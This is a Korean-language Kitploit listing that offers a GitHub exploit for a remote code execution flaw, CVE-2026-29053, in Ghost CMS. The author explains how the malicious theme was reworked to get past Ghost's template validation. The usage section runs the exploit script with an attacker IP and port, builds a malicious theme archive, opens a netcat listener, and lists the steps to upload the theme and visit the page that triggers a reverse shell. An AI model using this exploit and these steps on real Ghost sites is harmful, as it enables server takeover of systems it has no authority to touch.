Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-29053 — Ghost CMS에서 발견된 (RCE) 취약점 (특히 0.7.2부터 6.19.0까지의 버전에 영향) | Kitploit
도구/GitHubGitHub/ac8999/cve-2026-29053
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubac8999/cve-2026-29053

CVE-2026-29053

Ghost CMS에서 발견된 (RCE) 취약점 (특히 0.7.2부터 6.19.0까지의 버전에 영향)

저장소 보기
14개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

이것은 동일한 CVE에 대한 rootxran의 Repo를 재작업한 것입니다 - https://github.com/rootxran/CVE-2026-29053

특정 Ghost CMS 환경을 대상으로 테스트하는 동안, 원래 테마 페이로드에서 치명적인 Handlebars 오류(Fatal Handlebars Error)가 발생했습니다. CMS가 악성 테마를 활성화하지 못한 이유는 author.hbs 파일 내에서 더 이상 사용되지 않거나 누락된 헬퍼(social_url)를 참조했기 때문입니다.

저는 Handlebars 템플릿을 기본 제공되는 호환 가능한 헬퍼를 사용하도록 업데이트했습니다. 이를 통해 테마가 Ghost의 내부 검증 검사를 통과하여, 테마 엔진의 안전 파서에 차단되지 않고 익스플로잇이 성공적으로 활성화될 수 있습니다.

사용법: (영상 가이드는 원본 익스플로잇을 참조하세요).

root@kitploit:~
┌──(root㉿user)-[/tmp/CVE-2026-29053]
└─# python3 exploit.py -i 10.10.15.93 -p 4444
[+] Payload: 10.10.15.93:4444
[+] Created: /tmp/CVE-2026-29053/malicious-theme.zip

1. nc -lvnp 4444
2. 테마 업로드, slug 'rce'로 페이지 생성
3. /rce/ 방문
도구 다운로드